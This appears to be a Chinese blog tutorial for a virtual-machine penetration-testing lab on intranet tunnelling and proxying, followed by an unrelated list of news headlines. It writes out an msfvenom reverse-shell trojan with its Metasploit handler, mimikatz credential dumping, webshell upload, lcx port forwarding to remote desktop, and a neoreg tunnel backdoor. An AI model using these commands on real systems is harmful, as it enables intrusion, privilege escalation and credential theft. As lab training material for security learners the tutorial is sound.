内网隧道与代理 首先使用虚拟机搭建攻击环境三台电脑一台攻击机 外网一台被攻击的机器WEB服务器内网环境两块网卡外网内网一台KALI 外网 与攻击机处于同一网段------------------------------------------------------------------进入攻击的两种方法一是使用蚁剑二是使用MSF先来讲第一种方法向攻击中的网站服务器上传一句话木马然后使用蚁剑连接到这个一句话木马上。使用MSF生成SU.EXE木马。使用蚁剑将SU.EXE上传到被攻击的服务器上。---------------如果使用MSF,则在KALI中执行如下代码msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.11 lport4444 -f exe su.exe--在KALI本机上生成反向连接反向连接到本机IP 端口4444上的木马su.exemsfconsole--启动MSFuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcp--设置PAYLOADset lhost 10.0.0.11set lport 4444--设置反向连接的IP和端口然后启动连接。run启动后只要被攻击的服务品上SU.EXE木马执行那么在MSF中将会连接。在MSF中执行以下命令oad mimikatz 加载mimikatz工具getsystem 提权getuid 查看权限creds_all 一键抓取凭证--creds_all获取到 被攻击服务器密码然后使用LCX代理转发工具将选程连接到被攻击的服务器上。首选使用蚁剑上传LCX到被攻击服务器上和攻击机上LCX:纯端口转发尝试转发目标主机3389端口1、开启3389服务 打开的是远程桌面连接端口2、攻击机执行lcx.exe -listen 2222 1234#监听本地的2222端口将流量转发到12343、Webshell上执行lcx.exe -slave 10.0.0.1 2222 127.0.0.1 3389#将本机3389端口流量转 发到公网ip的2222端口上去在攻击上执行MSTSC127.0.0.11234 则进入到选程桌面可连接被攻击的服务器。至此LCX纯端口转发的实验已完成。----------------------------------------------------reGeorgProxifier 打通内网1、开启2003的IISweb服务2、生成并上传php后门python neoreg.py generate -k 1113、配置代理开启proxifier,代理服务器127.0.0.1:10804、neoreg添加隧道python neoreg.py -k 111 -u http://10.0.0.129:90/pikachu/tunnel.php额外添加python代理规则

相关新闻

最新新闻

AI辅助架构图绘制:Prompt工程实战与工作流集成

AI辅助架构图绘制:Prompt工程实战与工作流集成

1. 项目概述:从“画图工具”到“设计伙伴”的转变 作为一名在软件架构领域摸爬滚打了十多年的老兵,我画过的架构图连起来能绕办公室好几圈。从早期的Visio、Rational Rose,到后来的OmniGraffle、Draw.io,再到如今各种在线协作工具…

2026/8/16 23:05:14
传统SaaS智能化转型:AI客服、ChatBI与Agent工作流三大落地场景实践

传统SaaS智能化转型:AI客服、ChatBI与Agent工作流三大落地场景实践

1. 项目概述:当传统SaaS遇上AI,一场效率与体验的“化学反应” 这几年,AI大模型的风吹得有多猛,相信每个SaaS领域的从业者都深有体会。从最初的“这玩意儿能干啥”,到后来的“好像有点意思”,再到现在的“再…

2026/8/16 23:05:14
博科集团IVD全链布局:这家中国企业如何改写体外诊断的“世界规则”?

博科集团IVD全链布局:这家中国企业如何改写体外诊断的“世界规则”?

2025年11月,海南博科美谷,一场体外诊断领域的盛会正在上演。当博科集团自主研发的全自动生化免疫流水线MT8600揭下面纱,台下数百位行业领袖与顶尖专家看到的不仅是一款新产品,更是一个信号:在IVD这个过去由跨国巨头主导…

2026/8/16 23:05:14
基于人脸关键点与行为时序分析的睡岗识别系统实战指南

基于人脸关键点与行为时序分析的睡岗识别系统实战指南

1. 项目概述:从“睡岗”到智能值守的跨越“睡岗识别”这四个字,对于任何一个涉及生产安全、质量控制或服务监督的现场管理者来说,都像一根敏感的神经。它背后指向的是一个长期存在且难以根治的现场管理痛点:在需要人员持续保持警觉…

2026/8/16 23:05:14
01-05-运行时-JIT优化全景-内联去虚拟化边界检查消除

01-05-运行时-JIT优化全景-内联去虚拟化边界检查消除

JIT 优化全景:内联、去虚拟化、边界检查消除 系列:C#与常用数据结构源码剖析 运行时底层剖析 阅读时间:约 45 分钟 前置知识:JIT 编译管线、IL 基础 一、引言 前一篇文章介绍了 RyuJIT 的完整编译管线——20 个阶段从 IL 到机器…

2026/8/16 23:05:14
Windows Server防火墙IP拦截实战:从原理到四种配置方法详解

Windows Server防火墙IP拦截实战:从原理到四种配置方法详解

1. 从一次深夜告警说起:为什么需要精确拦截IP 凌晨两点,手机突然震动,监控系统发来告警:一台部署在Windows Server 2019上的内部应用服务器,其登录页面在短时间内收到了来自一个陌生IP地址的上千次访问请求。虽然系统本…

2026/8/16 23:00:14